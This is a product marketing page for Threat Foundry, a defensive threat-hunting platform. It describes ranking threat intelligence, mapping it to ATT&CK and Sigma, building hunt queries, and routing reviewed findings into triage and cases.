CTI Automation for Hunt Operations

Auto Triage ranks the CTI. Analysts decide what deserves hunting.

Threat Foundry automates the CTI-to-hunt workflow: fresh intelligence is scored, grouped, mapped to ATT&CK and Sigma context, and reviewed before hunt time is spent. Analysts keep source context, promote credible threats into SIEM-ready hunt packages, inspect highlighted evidence, and route reviewed entities into triage and cases.

Request a briefing See the workflow

CTI AutomationDaily intelligence ranking, source context, relevance gates, and analyst review states.

DecidePlaybooks, coverage, and reporting context help choose what deserves a hunt.

HuntATT&CK packages, attack paths, Sigma candidates, SIEM queries, and saved evidence.

InvestigateEntity analyzer, timeline, command graph, candidate ranking, triage, and cases.

Auto Triage

The critical workflow starts with ranked CTI.

Auto Triage is the front door of Threat Foundry. It scores newly ingested intelligence, promotes the top configured items for the current day or latest source update, and places each item into a review queue before analysts spend hunt time. The quality gate separates Hunt Ready, Review First, Needs Triage, and Not Actionable work so CTI automation produces accountable analyst decisions.

CTI Quality Gate Queue with Hunt Ready, Review First, Needs Triage, and Not Actionable columns — CTI Quality Gate Queue: review states before hunt generation.

Ranked Auto Triage CTI source items with source links and CTI intake actions — Ranked Auto Triage queue: current-day source items with context and intake actions.

Threat Foundry ransomware playbook with analyst goal and hunt steps — Playbooks translate threat themes into hunt goals, TTPs, and analyst steps.

Review Context

Use playbooks and reports to decide what deserves hunting.

Before a hunt exists, analysts can compare CTI against playbooks, program metrics, Sigma coverage, exposure, telemetry readiness, and recent operational history. This keeps automation accountable to the team’s actual detection goals instead of turning every feed item into work.

Threat playbooksOperational steps for ransomware, credential access, lateral movement, and impact scenarios.

ReportsOperational, executive, investigation, and program metric views for review and leadership context.

CoverageCoverage cards reveal where detection depth already exists and where hunt work is needed.

Reporting and Coverage

Leadership views without losing analyst evidence.

Threat Foundry keeps report views close to operational data: hunt activity, workload, coverage, telemetry readiness, evidence packages, and baselines.

Threat Foundry operational reporting dashboard — Operational reporting summarizes hunt work and readiness.

Sigma coverage by ATT&CK tactic shows detection depth at a glance.

Build Attack Paths

Turn approved TTPs into ordered hunt logic.

Attack Path Builder lets analysts seed a path from a threat actor or assemble techniques manually, then generate SIEM-ready hunt logic from the exact sequence. It supports staged thinking instead of one-off query generation.

Drag TTP cards into the investigation order analysts want to test.
Generate review-only tool queries or generic cross-tool recommendations.
Run combined searches only after explicit analyst approval.

Built Attack Path Graph with ordered ATT&CK techniques — Built attack path with ordered TTP nodes, ready for review and generation.

Sigma Evidence

See exactly why a Sigma rule triggered.

Triggered Sigma views connect detection logic to the returned SIEM rows. Threat Foundry highlights the exact matched fields and tokens, keeps the source row visible, and gives analysts a fast way to validate whether a rule match is meaningful evidence or expected activity.

Highlighted log lines show the Sigma field or token that matched.
Rule metadata, references, false positives, and ATT&CK context stay beside the evidence.
Analysts can move from triggered content into saved hunts, triage, and case handoff.

Triggered Sigma rule details showing highlighted SIEM log-row matches — Sigma rule highlight: exact matched fields and evidence rows are readable before analysts decide next steps.

Saved Hunt Review

Review the hunt package before triage.

Saved hunts preserve source context, confidence, generated query references, rerun history, entity coverage, and enrichment actions. Triage happens after review, when a human has seen the evidence and decided it deserves follow-through.

PowerShell saved hunt review package with confidence, enrichment, export, and triage controls — Known-good PowerShell saved hunt: review first, then triage if warranted.

Entity Analyzer

Move from SIEM rows to investigation shape.

Entity Analyzer turns returned hunt results into a practical investigation surface. Analysts can see which accounts, hosts, processes, commands, and related observables recur across the evidence, then pivot without losing the original hunt context.

Returned fields are normalized into analyst-friendly entity groups.
Entity pivots keep follow-on hunts grounded in reviewed evidence.
Candidate ranking highlights the accounts, hosts, commands, and processes worth pursuing.

Command Analyzer graph showing PowerShell command relationships — Command Analyzer connects accounts, hosts, processes, and suspicious commands.

Distilled hunt candidates with ranked commands, processes, accounts, and hosts — Distilled Hunt Candidates rank commands, processes, accounts, and hosts for follow-up.

Threat Foundry triage queue for reviewed findings — Triage and case management capture reviewed findings, owners, tickets, and handoff history.

Govern the Workflow

Wire the platforms in without hardcoding the process.

Configuration covers query platforms, vendor integrations, field normalization, assets, baselines, API Connect, source refresh behavior, model settings, and audit trails. The product can start in the lab and grow into live SOC wiring.

IntegrationsSIEM, EDR, vulnerability scanners, CTI feeds, identity, SOAR, and ticketing handoff.

PolicyQuery limits, source controls, field mapping, data caps, and telemetry readiness.

AuditSOAR/API requests, AI usage, triage history, saved-hunt notes, and report outputs.

Threat Foundry configuration and integrations page — Governance and integration settings keep automation aligned to the SOC.

Platform Flow

Fresh intelligence becomes reviewed action.

Auto Triage

CTI feeds, emailed threats, reports, KEVs, EDR alerts, and vulnerability context enter a ranked daily review queue.

Review context

Analysts check source detail, playbooks, reports, coverage, and evidence before spending hunt time.

Generate hunts

Approved CTI becomes ATT&CK hunt packages, attack paths, Sigma candidates, and saved evidence.

Investigate and route

Timelines, entity graphs, candidates, triage, cases, reporting, and tickets close the loop.

Deployment

Built for teams wiring real platforms into accountable hunt operations.

Threat Foundry can start with generic hunts and grow into live SIEM, CTI, EDR, vulnerability management, Sigma, SOAR, and ticketing integrations.

Talk through deployment